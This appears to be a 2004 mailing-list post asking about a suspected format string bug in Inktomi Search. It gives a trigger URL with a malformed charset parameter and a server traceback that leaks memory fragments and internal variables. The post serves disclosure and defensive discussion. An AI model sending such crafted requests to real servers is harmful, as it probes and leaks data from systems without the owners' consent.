Besides the discussion found here:
http://lists.virus.org/dw-0day-0306/msg00071.html
Which confirms the existance of a format string bug, has anyone seen anymore
on the following FS bug in inktomi search?
URL: http://<vuln_inktomisearch_server>/query.html?charset=%3
RESPONSE:
Internal Server Error
Server cannot complete operation
exceptions.UnicodeError: unknown encoding 0'<meta htPk�� k�� u': ', u'Server
cannot complete operati�
File httpsrvr.py, line 501, in parse_qs
charset = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot
comple
enclst = [('charset', ["0'<meta htPk\031\002\240k\031\002 u': ',
u'Server
ent = ['charset', '%3']
idx = 0
key = 'charset'
lst = ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot
complete
nodecode = []
qs = 'charset=%3'
query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server
ca
self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
val = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot complete
o
File httpsrvr.py, line 778, in handle
frag = ''
netloc = '<vuln_inktomisearch_server>'
parms = ''
path = '/query.html'
qs = 'charset=%3'
query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server
ca
req = ''
scheme = 'http'
self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>
thr = 413
File httpsrvr.py, line 904, in __init__
client_address = ('XXX.XXX.XXX.XXX', 56730)
sckt = <socket._socketobject instance at 21957c0>
self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>
_________________________________________________________________
Hot chart ringtones and polyphonics. Go to
http://ninemsn.com.au/mobilemania/default.asp
Received on Mar 02 2004
